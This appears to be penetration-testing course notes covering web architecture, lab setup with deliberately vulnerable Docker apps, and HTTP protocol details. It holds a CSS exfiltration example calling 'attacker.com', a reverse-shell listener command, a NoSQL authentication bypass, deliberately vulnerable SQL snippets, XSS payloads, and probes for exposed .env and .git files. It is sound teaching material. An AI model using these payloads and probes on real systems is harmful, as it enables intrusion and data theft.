Foundation & Lab Build Up

Task 1

Web Application Architecture

1. Client-Server Model

Modern web applications operate on the client-server model. The client (browser) sends HTTP requests, and the server processes them and returns responses.

+-------------------+         HTTP Request          +-------------------+
|                   |  --------------------------->  |                   |
|   Client          |                                |   Server          |
|   (Browser)       |  <---------------------------  |   (Web App)       |
|                   |         HTTP Response          |                   |
+-------------------+                                +-------------------+

Request-Response Cycle

User enters URL or submits a form
Browser resolves the domain to an IP via DNS
TCP connection established (3-way handshake)
TLS handshake if HTTPS
HTTP request sent to the server
Server processes the request
Server returns an HTTP response
Browser renders the response

2. N-Tier Architecture

2.1 Three-Tier Architecture (Most Common)

+-----------------+       +------------------+       +------------------+
| Presentation    | <---> | Application Tier | <---> | Data Tier        |
| (Client/Browser)|       | (Web Server/App) |       | (Database)       |
+-----------------+       +------------------+       +------------------+

Presentation Tier: HTML, CSS, JavaScript rendered in browser
Application Tier: Server-side logic (authentication, authorization, business rules)
Data Tier: Persistent storage (databases, file systems)

2.2 Four-Tier and Beyond

+--------+     +---------+     +----------+     +----------+     +----------+
| Client | --> | CDN/LB  | --> | Web      | --> | App      | --> | Database |
|        |     |         |     | Server   |     | Server   |     |          |
+--------+     +---------+     +----------+     +----------+     +----------+

Additional tiers include:

Load balancers (HAProxy, AWS ALB)
Caching layers (Redis, Memcached, Varnish)
Message queues (RabbitMQ, Kafka)
API gateways (Kong, AWS API Gateway)
Microservice mesh layers (Istio, Linkerd)

3. Frontend Technologies

3.1 HTML (HyperText Markup Language)

HTML defines the structure of web pages. Security-relevant HTML elements:

<form action="/login" method="POST">
    <input type="text" name="username">
    <input type="password" name="password">
    <input type="hidden" name="csrf_token" value="a8f9d7e6b5c4">
    <button type="submit">Login</button>
</form>

Security-relevant elements:

<form>: action URL, method, enctype
<input type="hidden">: tokens, IDs, state
<iframe>: clickjacking vector
<script>: XSS vector
<a href="javascript:...">: XSS vector
<meta http-equiv="refresh">: open redirect vector

3.2 CSS (Cascading Style Sheets)

CSS controls visual presentation. Can be leveraged for:

/* CSS-based data exfiltration */
input[value^="a"] { background: url('https://attacker.com/log?char=a'); }
input[value^="b"] { background: url('https://attacker.com/log?char=b'); }

Attack vectors: CSS injection, UI redressing, keystroke timing attacks

3.3 JavaScript

JavaScript runs in the browser and is the primary target for client-side attacks.

// Fetching data from an API
fetch('/api/users/profile', {
    method: 'GET',
    headers: {
        'Authorization': 'Bearer eyJhbGciOiJIUzI1NiJ9...',
        'Content-Type': 'application/json'
    },
    credentials: 'include'
})
.then(response => response.json())
.then(data => {
    document.getElementById('username').innerText = data.username;
});

Dangerous sinks (XSS vectors):

eval(), Function(), setTimeout(string), setInterval(string)
innerHTML, outerHTML, document.write()
location.href, location.assign(), location.replace()

3.4 SPA Frameworks

Framework	Language	Security Considerations
React	JavaScript	`dangerouslySetInnerHTML`, JSX auto-escapes
Angular	TypeScript	Template injection, `bypassSecurityTrust*`
Vue.js	JavaScript	`v-html` directive, template injection
Svelte	JavaScript	`{@html}` tag for raw HTML
Next.js	JavaScript	SSR XSS, API routes exposure

Security considerations for SPAs:

Client-side routing can bypass server-side access controls
API endpoints exposed in JavaScript bundles
Sensitive data in client-side state (Redux, Vuex)
Source maps can reveal original source code
Build artifacts may contain hardcoded API keys

4. Backend Technologies

4.1 PHP

// VULNERABLE: SQL injection
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($conn, $query);

// SECURE: Prepared statements
$stmt = $conn->prepare("SELECT * FROM users WHERE username=? AND password=?");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();

Common attack vectors: file inclusion (LFI/RFI), type juggling, deserialization, command injection via system(), exec(), passthru(), shell_exec()

4.2 Python (Django, Flask, FastAPI)

# VULNERABLE: SQL injection
cursor = conn.execute(f"SELECT * FROM products WHERE name LIKE '%{query}%'")

# SECURE: Parameterized query
cursor = conn.execute("SELECT * FROM products WHERE name LIKE ?", (f'%{query}%',))

Attack vectors: SSTI (Jinja2), pickle deserialization, SSRF via requests library

4.3 Java (Spring Boot, Jakarta EE)

@RestController
@RequestMapping("/api/users")
public class UserController {
    @GetMapping("/{id}")
    public ResponseEntity<User> getUser(@PathVariable Long id) {
        return ResponseEntity.ok(userService.findById(id));
    }
}

Attack vectors: deserialization, JNDI injection (Log4Shell), EL injection, XXE

4.4 Node.js (Express, NestJS)

const express = require('express');
const app = express();

app.get('/api/user/:id', async (req, res) => {
    const user = await db.collection('users').findOne({ _id: req.params.id });
    res.json(user);
});

Attack vectors: prototype pollution, NoSQL injection, SSTI, dependency confusion

4.5 .NET (ASP.NET Core)

[ApiController]
[Route("api/[controller]")]
public class ProductsController : ControllerBase {
    [HttpGet("{id}")]
    public async Task<ActionResult<Product>> GetProduct(int id) {
        var product = await _context.Products.FindAsync(id);
        return product == null ? NotFound() : Ok(product);
    }
}

Attack vectors: ViewState deserialization, padding oracle, XAML injection

5. Databases

5.1 Relational Databases (SQL)

Database	Default Port	Common Use Case
MySQL	3306	Web applications, CMS
PostgreSQL	5432	Enterprise applications
MSSQL	1433	Windows/.NET environments
Oracle	1521	Enterprise applications
SQLite	N/A (file)	Embedded/mobile apps

5.2 NoSQL Databases

Database	Type	Default Port
MongoDB	Document store	27017
Redis	Key-value	6379
CouchDB	Document store	5984
Elasticsearch	Search engine	9200
Cassandra	Column store	9042

// MongoDB NoSQL Injection
db.users.find({ username: "admin", password: { $gt: "" } });
// Always true - bypasses authentication

5.3 Caching Layers

Client -> Web Server -> Cache (Redis/Memcached) -> App Server -> Database
                          |
                          +-- Cache Hit: Return cached response

Security implications: cache poisoning, sensitive data in cache, cache key manipulation, web cache deception

6. Web Servers

6.1 Apache HTTP Server

<VirtualHost *:80>
    ServerName example.com
    DocumentRoot /var/www/html
    <Directory /var/www/html>
        Options -Indexes -FollowSymLinks
        AllowOverride None
    </Directory>
    Header always set X-Content-Type-Options "nosniff"
    Header always set X-Frame-Options "DENY"
    ServerTokens Prod
    ServerSignature Off
</VirtualHost>

Attack vectors: .htaccess misconfiguration, directory traversal, mod_cgi exploitation, server-status exposure

6.2 Nginx

server {
    listen 80;
    server_name example.com;
    root /var/www/html;
    server_tokens off;

    location /api/ {
        proxy_pass http://127.0.0.1:3000/;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }

    location ~ /\. { deny all; }
}

Attack vectors: off-by-slash misconfiguration, alias traversal, merge_slashes bypass, request smuggling

6.3 IIS (Internet Information Services)

Attack vectors: short filename disclosure (8.3 naming), web.config exposure, tilde enumeration

7. Load Balancers, CDNs, and Reverse Proxies

7.1 Load Balancers

                          +-- Server 1 (10.0.0.1)
                         /
Client --> Load Balancer --- Server 2 (10.0.0.2)
                         \
                          +-- Server 3 (10.0.0.3)

Security implications:

X-Forwarded-For header manipulation for IP spoofing
Session persistence issues during testing
Health check endpoints may leak information
Different backends may have inconsistent configurations

7.2 CDNs (Content Delivery Networks)

Major providers: Cloudflare, AWS CloudFront, Akamai, Fastly

Security implications:

CDNs mask the origin server's real IP
WAF bypass by accessing origin directly
Cache poisoning attacks
Subdomain takeover of CDN-pointed domains

7.3 Reverse Proxies

Security implications:

Path normalization differences between proxy and backend
Request smuggling (CL.TE, TE.CL)
Header injection via X-Forwarded-Host, X-Original-URL
SSRF through proxy misconfiguration

8. Microservices vs Monolithic Architecture

8.1 Monolithic

+-----------------------------------------------+
|               Monolithic Application           |
|  +----------+  +----------+  +-----------+    |
|  |   Auth   |  | Products |  |  Orders   |    |
|  +----------+  +----------+  +-----------+    |
|  Single Database (MySQL)                      |
+-----------------------------------------------+

Pentest considerations:

Single entry point, simpler recon
One vulnerability may compromise everything
Fewer internal authentication boundaries

8.2 Microservices

                    +-- Auth Service (Node.js) --> Users DB
                   /
API Gateway ------+--- Product Service (Java) --> Products DB
                   \
                    +-- Order Service (Python) --> Orders DB

Pentest considerations:

Multiple entry points and attack surfaces
Inter-service communication may lack authentication
API gateway misconfigurations
Different tech stacks = different vulnerability classes
Container/Kubernetes layer introduces new vectors

9. Data Flow and Trust Boundaries

+-------------------+
| Untrusted Zone    |     TRUST BOUNDARY 1
| (Internet/Client) |     ==================
+-------------------+
         |
+-------------------+
| DMZ               |     TRUST BOUNDARY 2
| (Web Server/WAF)  |     ==================
+-------------------+
         |
+-------------------+
| Application Zone  |     TRUST BOUNDARY 3
| (App Servers)     |     ==================
+-------------------+
         |
+-------------------+
| Data Zone         |
| (Databases)       |
+-------------------+

Every trust boundary is a potential attack point where data crosses from one trust level to another.

10. Attack Surface Mapping

Component	Attack Surface Elements
Frontend	Forms, URL parameters, JavaScript APIs, DOM
HTTP layer	Headers, cookies, methods, request body
Authentication	Login forms, password reset, registration, MFA
API endpoints	REST, GraphQL, WebSocket connections
File handling	Upload, download, path parameters
Third-party integrations	OAuth flows, payment gateways, webhooks
Admin interfaces	Admin panels, management APIs, debug endpoints
Infrastructure	Web server configs, default pages, error messages

Architecture Reconnaissance Commands

# Identify web server
curl -s -I https://target.com | grep -i "server\|x-powered-by"

# Check for technology indicators
curl -s https://target.com | grep -i "wp-content\|drupal\|joomla"

# Find API endpoints in JavaScript
curl -s https://target.com/static/js/app.js | grep -oP '"/api/[^"]*"'

# Check for exposed config files
curl -s -o /dev/null -w "%{http_code}" https://target.com/.env
curl -s -o /dev/null -w "%{http_code}" https://target.com/.git/HEAD

# Check for CDN
curl -s -I https://target.com | grep -i "cf-ray\|x-cache\|x-amz-cf\|x-cdn"

Task 2

Lab Setup

1. Kali Linux Setup

1.1 Installation Options

VM: VMware Workstation/Player or VirtualBox
WSL2: Windows Subsystem for Linux
Bare Metal: Dedicated machine
Cloud: AWS/DigitalOcean/Linode instance
Docker: docker pull kalilinux/kali-rolling

1.2 Post-Installation Setup

# Update the system
sudo apt update && sudo apt upgrade -y

# Install essential tools
sudo apt install -y \
    burpsuite zaproxy \
    nmap masscan rustscan \
    gobuster ffuf feroxbuster dirsearch \
    sqlmap nikto wpscan \
    hydra john hashcat \
    curl wget httpie jq \
    python3-pip golang-go \
    git vim tmux net-tools \
    dnsutils whois

# Install Go-based tools
go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install github.com/projectdiscovery/katana/cmd/katana@latest
go install github.com/tomnomnom/waybackurls@latest
go install github.com/tomnomnom/gf@latest
go install github.com/lc/gau/v2/cmd/gau@latest
go install github.com/hakluke/hakrawler@latest

# Install Python tools
pip3 install arjun uro pycurl requests beautifulsoup4

# Add Go bin to PATH
echo 'export PATH=$PATH:$HOME/go/bin' >> ~/.bashrc
source ~/.bashrc

2. Vulnerable Applications

2.1 DVWA (Damn Vulnerable Web Application)

# Docker setup
docker run -d -p 8080:80 --name dvwa vulnerables/web-dvwa

# Access at http://localhost:8080
# Default credentials: admin/password
# Setup database at /setup.php

2.2 OWASP Juice Shop

# Docker setup
docker run -d -p 3000:3000 --name juice-shop bkimminich/juice-shop

# Access at http://localhost:3000

2.3 WebGoat

# Docker setup
docker run -d -p 8081:8080 -p 9090:9090 --name webgoat webgoat/webgoat

# WebGoat at http://localhost:8081/WebGoat
# WebWolf at http://localhost:9090/WebWolf

2.4 bWAPP

docker run -d -p 8082:80 --name bwapp raesene/bwapp

# Access at http://localhost:8082/install.php

2.5 HackTheBox & TryHackMe

HackTheBox: https://www.hackthebox.com - Competitive labs with real-world scenarios
TryHackMe: https://tryhackme.com - Guided learning paths
Both require VPN connection to access lab machines

2.6 Complete Lab with Docker Compose

# docker-compose.yml
version: '3'
services:
  dvwa:
    image: vulnerables/web-dvwa
    ports:
      - "8080:80"
    restart: unless-stopped

  juice-shop:
    image: bkimminich/juice-shop
    ports:
      - "3000:3000"
    restart: unless-stopped

  webgoat:
    image: webgoat/webgoat
    ports:
      - "8081:8080"
      - "9090:9090"
    restart: unless-stopped

  bwapp:
    image: raesene/bwapp
    ports:
      - "8082:80"
    restart: unless-stopped

  hackazon:
    image: ianwijaya/hackazon
    ports:
      - "8083:80"
    restart: unless-stopped

  mysql:
    image: mysql:5.7
    environment:
      MYSQL_ROOT_PASSWORD: root
      MYSQL_DATABASE: testdb
    ports:
      - "3306:3306"
    restart: unless-stopped

  phpmyadmin:
    image: phpmyadmin/phpmyadmin
    ports:
      - "8084:80"
    environment:
      PMA_HOST: mysql
    restart: unless-stopped

  mongo:
    image: mongo:latest
    ports:
      - "27017:27017"
    restart: unless-stopped

# Start all containers
docker-compose up -d

# Stop all
docker-compose down

# View logs
docker-compose logs -f

3. Burp Suite Setup

3.1 Installation

Download from https://portswigger.net/burp
Community Edition is free, Professional requires license
Java required (bundled with installer)

3.2 Browser Proxy Configuration

# Firefox (recommended for testing)
Preferences -> Network Settings -> Manual Proxy
HTTP Proxy: 127.0.0.1    Port: 8080
HTTPS Proxy: 127.0.0.1   Port: 8080

# Or use FoxyProxy extension for easy switching

3.3 CA Certificate Installation

Navigate to http://burpsuite with proxy enabled
Download the CA certificate
Import into browser: Settings -> Certificates -> Import -> Select cacert.der

4. OWASP ZAP Setup

# Install ZAP
sudo apt install zaproxy

# Or Docker
docker run -u zap -p 8085:8080 -p 8086:8090 -i ghcr.io/zaproxy/zaproxy:stable zap-webswing.sh

# Configure browser proxy to localhost:8085

5. Database Setup for Testing

# MySQL
docker run -d --name mysql-test -e MYSQL_ROOT_PASSWORD=root -p 3306:3306 mysql:5.7

# Connect
mysql -h 127.0.0.1 -u root -proot

# PostgreSQL
docker run -d --name postgres-test -e POSTGRES_PASSWORD=postgres -p 5432:5432 postgres:13

# Connect
psql -h 127.0.0.1 -U postgres

# MongoDB
docker run -d --name mongo-test -p 27017:27017 mongo:latest

# Connect
mongosh mongodb://127.0.0.1:27017

# Redis
docker run -d --name redis-test -p 6379:6379 redis:latest

# Connect
redis-cli -h 127.0.0.1

6. Network Configuration

# Check your IP
ip addr show
ifconfig

# Set up a listener for reverse shells
nc -lvnp 4444

# Create a simple HTTP server
python3 -m http.server 8888

# Set up port forwarding
ssh -L 8080:internal-target:80 user@jump-host

# Use ngrok for external access to local services
ngrok http 8080

7. VM Snapshots and Lab Management

# VirtualBox snapshots
VBoxManage snapshot "KaliVM" take "clean-state" --description "Fresh install"
VBoxManage snapshot "KaliVM" restore "clean-state"

# VMware snapshots via CLI
vmrun snapshot "/path/to/vm.vmx" "clean-state"
vmrun revertToSnapshot "/path/to/vm.vmx" "clean-state"

# Docker container management
docker ps -a                    # List all containers
docker start dvwa               # Start a container
docker stop dvwa                # Stop a container
docker restart dvwa              # Restart
docker rm dvwa                   # Remove container
docker system prune              # Clean up unused resources

8. Essential Tool Installation Script

#!/bin/bash
# pentest-setup.sh - Complete pentest environment setup

echo "[*] Updating system..."
sudo apt update && sudo apt upgrade -y

echo "[*] Installing base packages..."
sudo apt install -y git curl wget python3 python3-pip golang-go \
    nmap masscan whois dnsutils jq tmux vim net-tools

echo "[*] Installing Go tools..."
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin

tools=(
    "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest"
    "github.com/projectdiscovery/httpx/cmd/httpx@latest"
    "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest"
    "github.com/projectdiscovery/katana/cmd/katana@latest"
    "github.com/tomnomnom/waybackurls@latest"
    "github.com/tomnomnom/gf@latest"
    "github.com/lc/gau/v2/cmd/gau@latest"
    "github.com/ffuf/ffuf/v2@latest"
    "github.com/OJ/gobuster/v3@latest"
    "github.com/hakluke/hakrawler@latest"
)

for tool in "${tools[@]}"; do
    echo "[*] Installing $tool..."
    go install "$tool"
done

echo "[*] Installing Python tools..."
pip3 install arjun sqlmap uro requests beautifulsoup4 pyjwt

echo "[*] Updating nuclei templates..."
nuclei -update-templates

echo "[*] Creating working directories..."
mkdir -p ~/pentests/{recon,exploits,reports,loot}

echo "[+] Setup complete!"

Task 3

HTTP Protocol Deep Dive

1. HTTP Protocol Versions

HTTP/1.1

Text-based protocol
One request per TCP connection (without keep-alive)
Keep-alive allows connection reuse
Head-of-line blocking issue

HTTP/2

Binary protocol (framing layer)
Multiplexing: multiple requests over single TCP connection
Header compression (HPACK)
Server push capability
Stream prioritization

HTTP/3

Based on QUIC protocol (UDP instead of TCP)
Built-in encryption (TLS 1.3)
Improved connection migration
Reduced latency

Security implications: HTTP/2 introduces request smuggling variants (H2.CL, H2.TE), binary protocol complicates manual inspection

2. HTTP Request Structure

METHOD /path/to/resource?param=value HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Cookie: session=abc123; token=xyz789
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Connection: keep-alive
Referer: https://example.com/login

username=admin&password=test

Components:

Request Line: Method, URI, HTTP version
Headers: Key-value pairs with metadata
Empty Line: Separates headers from body
Body: Optional data (POST, PUT, PATCH)

3. HTTP Methods and Security Implications

Method	Purpose	Security Implications
GET	Retrieve resources	Parameters in URL (logged, cached, bookmarked, Referer)
POST	Submit data	Body not cached/logged by default, CSRF vulnerable
PUT	Replace resource	May allow file upload, unauthorized resource modification
DELETE	Delete resource	Unauthorized deletion, no confirmation
PATCH	Partial modification	Mass assignment, partial update bypass
OPTIONS	Discover allowed methods	CORS preflight, information disclosure
TRACE	Echo back request	Cross-Site Tracing (XST) for cookie theft
HEAD	GET without body	Information disclosure, fingerprinting
CONNECT	Establish tunnel	SSRF, proxy abuse

Testing HTTP Methods

# Check allowed methods
curl -X OPTIONS https://target.com/api/users -i

# Test method override headers
curl -X POST https://target.com/api/users/1 -H "X-HTTP-Method-Override: DELETE"
curl -X POST https://target.com/api/users/1 -H "X-Method-Override: PUT"

# Test TRACE method
curl -X TRACE https://target.com/ -i

4. HTTP Response Structure

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sat, 01 Jan 2025 12:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1234
Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Lax; Path=/
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src 'self'
Cache-Control: no-store

<!DOCTYPE html>
<html>...

5. Status Codes and Security Implications

Code	Meaning	Security Implication
200	OK	Normal response
201	Created	Resource created, check for mass assignment
301	Moved Permanently	Open redirect potential
302	Found (Redirect)	Open redirect, OAuth token leakage
304	Not Modified	Cache-based information disclosure
400	Bad Request	Input validation, error messages may leak info
401	Unauthorized	Authentication required, brute force target
403	Forbidden	Access control in place, potential bypass
404	Not Found	Directory enumeration, user enumeration
405	Method Not Allowed	Try other methods, method override headers
413	Payload Too Large	File upload limits, bypass with chunked encoding
429	Too Many Requests	Rate limiting, bypass techniques needed
500	Internal Server Error	Error messages may leak stack traces, paths
502	Bad Gateway	Backend server issues, smuggling potential
503	Service Unavailable	DoS indication, maintenance mode bypass

# Identify status code differences for user enumeration
curl -s -o /dev/null -w "%{http_code}" https://target.com/api/user/existing_user
curl -s -o /dev/null -w "%{http_code}" https://target.com/api/user/nonexistent_user

6. Important HTTP Headers

6.1 Security Headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: DENY | SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-abc123'
X-XSS-Protection: 0
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: camera=(), microphone=(), geolocation=()
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp

6.2 Information Disclosure Headers

Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/7.4.3
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
X-Generator: Drupal 9

6.3 CORS Headers

Access-Control-Allow-Origin: https://example.com
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, PUT, DELETE
Access-Control-Allow-Headers: Authorization, Content-Type
Access-Control-Max-Age: 86400

6.4 Caching Headers

Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: 0
ETag: "abc123"
Last-Modified: Wed, 01 Jan 2025 00:00:00 GMT

7. Cookies and Attributes

Set-Cookie: session=abc123; Domain=.example.com; Path=/; Expires=Thu, 01 Jan 2026 00:00:00 GMT; HttpOnly; Secure; SameSite=Lax

Attribute	Purpose	Security Impact
Secure	Only sent over HTTPS	Prevents interception over HTTP
HttpOnly	Not accessible via JavaScript	Mitigates XSS cookie theft
SameSite	Controls cross-site sending (Strict/Lax/None)	CSRF protection
Domain	Specifies which domains receive the cookie	Subdomain scope, cookie tossing
Path	Limits cookie to specific path	Path-based isolation
Expires	When cookie expires	Session duration control
__Secure-	Prefix requiring Secure flag	Cookie integrity
__Host-	Prefix requiring Secure, Path=/, no Domain	Strongest cookie security

# Analyze cookies
curl -v https://target.com/login 2>&1 | grep -i "set-cookie"

# Test cookie without HttpOnly
curl -b "session=abc123" https://target.com/dashboard

8. HTTP Authentication Schemes

Basic Authentication

# Base64 encoded username:password
curl -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ=" https://target.com/admin

# Equivalent to
curl -u admin:password https://target.com/admin

# Decode basic auth
echo "YWRtaW46cGFzc3dvcmQ=" | base64 -d
# Output: admin:password

Bearer Token (JWT/OAuth)

curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U" https://target.com/api/profile

Digest Authentication

curl --digest -u admin:password https://target.com/admin

NTLM Authentication

curl --ntlm -u domain\\user:password https://target.com/

9. Encoding

URL Encoding

Character	Encoded
Space	%20 or +
<	%3C
>	%3E
"	%22
'	%27
/	%2F
\	%5C
#	%23
?	%3F
&	%26
=	%3D

# URL encoding with curl
curl "https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E"

# Double URL encoding
curl "https://target.com/search?q=%253Cscript%253Ealert(1)%253C/script%253E"

Base64 Encoding

# Encode
echo -n "admin:password" | base64
# YWRtaW46cGFzc3dvcmQ=

# Decode
echo "YWRtaW46cGFzc3dvcmQ=" | base64 -d
# admin:password

Unicode Encoding

\u003c = <
\u003e = >
\u0022 = "
\u0027 = '

10. WebSocket Protocol

GET /chat HTTP/1.1
Host: example.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13
Origin: https://example.com

Response:

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=

Security considerations:

Origin header not enforced by default
Cross-Site WebSocket Hijacking (CSWSH)
No same-origin policy for WebSocket
Messages not inspected by WAFs typically
ws:// sends data unencrypted

Testing WebSocket with curl/websocat

# Using websocat
websocat ws://target.com/socket

# Using JavaScript in browser console
let ws = new WebSocket('wss://target.com/socket');
ws.onmessage = (e) => console.log(e.data);
ws.send('{"action":"getUsers"}');

11. Practical curl Examples

# GET request with headers
curl -H "Authorization: Bearer TOKEN" -H "Accept: application/json" https://target.com/api/users

# POST with form data
curl -X POST -d "username=admin&password=test" https://target.com/login

# POST with JSON
curl -X POST -H "Content-Type: application/json" -d '{"username":"admin","password":"test"}' https://target.com/api/login

# Follow redirects
curl -L https://target.com/redirect

# Show response headers only
curl -I https://target.com

# Verbose output (see full request/response)
curl -v https://target.com 2>&1

# Send through proxy (Burp Suite)
curl -x http://127.0.0.1:8080 -k https://target.com

# Cookie handling
curl -b "session=abc123" https://target.com/dashboard
curl -c cookies.txt -b cookies.txt https://target.com/login

# Upload file
curl -F "[email protected]" https://target.com/upload

# Custom method
curl -X PUT -d '{"role":"admin"}' https://target.com/api/users/1

# Multiple headers
curl -H "X-Forwarded-For: 127.0.0.1" -H "X-Real-IP: 127.0.0.1" https://target.com/admin